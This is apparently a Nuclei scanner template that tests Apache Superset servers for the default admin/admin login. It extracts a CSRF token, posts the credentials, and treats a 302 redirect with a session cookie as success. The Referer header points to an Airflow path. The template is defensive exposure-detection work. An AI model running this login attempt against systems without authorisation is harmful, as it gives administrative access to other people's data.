id: apache-superset-default-login
info:
  name: Apache Superset Default Login
  author: dhiyaneshDK
  severity: high
  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
  tags: apache, default-login
requests:
  - raw:
      - |
        GET /login/ HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/admin/airflow/login

        csrf_token={{csrf_token}}&username={{username}}&password={{password}}
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - admin
    extractors:
      - type: regex
        name: csrf_token
        group: 1
        part: body
        internal: true
        regex:
          - 'value="(.*?)">'
    matchers-condition: and
    matchers:
      - type: word
        part: body
        condition: and
        words:
          - '<title>Redirecting...</title>'
          - '<h1>Redirecting...</h1'
          - '<a href="/">'
      - type: word
        part: header
        words:
          - 'session'
      - type: status
        status:
          - 302
